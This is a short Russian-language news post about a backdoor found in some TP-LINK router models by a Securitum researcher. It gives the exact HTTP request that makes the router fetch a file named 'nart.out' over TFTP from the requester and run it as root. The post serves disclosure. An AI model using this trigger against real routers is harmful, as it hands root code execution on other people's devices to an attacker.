Бэкдор в роутерах TP-LINK

Польский security-эксперт Michał Sajdak из компании Securitum нашел очень интересный бэкдор в роутерах TP-LINK.

Эксплуатация бэкдора довольна проста, и её суть показана на следующей иллюстрации:
Бэкдор в роутерах TP LINK

Инструкция:

Пользователь выполняет HTTP-запрос:
```
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
```
Роутер подключается к IP-адресу, сделавшему данный запрос, и пробует найти TFTP-сервер.
В случае если TFTP-сервер найден, роутер скачивает файл «nart.out» и запускает его от рута.

Скорее всего данный бэкдор может быть использован только внутри сети.
Бэкдор содержат следующие модели роутеров: TL-WDR4300, TL-WR743ND (v1.2 v2.0). Однако данный список может быть не полный.
Оригинал: link ^[1]

Автор: ahtox74

Источник ^[2]

Сайт-источник PVSM.RU: https://www.pvsm.ru

Путь до страницы источника: https://www.pvsm.ru/uyazvimost/29436

Ссылки в тексте:

[1] link: http://sekurak.pl/tp-link-httptftp-backdoor/

[2] Источник: http://habrahabr.ru/post/172799/

Нажмите здесь для печати.